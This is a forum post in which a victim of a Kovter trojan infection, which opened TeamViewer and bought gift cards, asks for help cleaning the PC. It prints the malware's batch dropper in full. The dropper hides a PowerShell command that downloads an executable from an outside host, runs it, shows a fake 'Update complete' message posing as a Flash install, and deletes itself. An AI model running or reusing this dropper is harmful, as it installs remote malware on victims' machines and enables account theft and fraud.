I came home yesterday to teamviewer opened and some giftcards purchased on my amazon account. I've reversed all charges and everything so that's all said and done. The only issue I'm having is cleaning my pc from whatever hit it.
The trojan was a kovter and I looked at its origin:
That made no sense to me seeing how it is 2018 and that is the only thing 4 antiviruses have found.
I checked it on virus total and got this:
Now, this virus seemed to fuck with my registry and powershell. I am not experienced in any of that. If anyone knows anything about it, I will upload the contents of the virus here. (NOT THE VIRUS ITSELF, JUST THE STUFF IN THE FILE)
@echo off
echo a=new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\ff327a5feb135015ae1bb140607f9ded.exe';(New-Object System.Net.WebClient).DownloadFile('https://yiomolibertyreserve.org/17/528.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK,[System.Windows.Forms.MessageBoxIcon]::Information)",0,false); >"%temp%\install_flash.js"
start /min "" wscript.exe "%temp%\install_flash.js"
DEL "%~f0
I found the file from 2016 in my google downloads folder from the same link from within the file. Now, I would never download something this stupid. That also means it was a forced download meant to look like a chrome update.
If ANYONE can offer some assistance on what that means I would be incredibly grateful. And if anyone knows of other affected areas of my pc based off of that that would also be helpful. I'll probably send someone $20 on steam or something if they can successfully help me out here. Thanks in advance.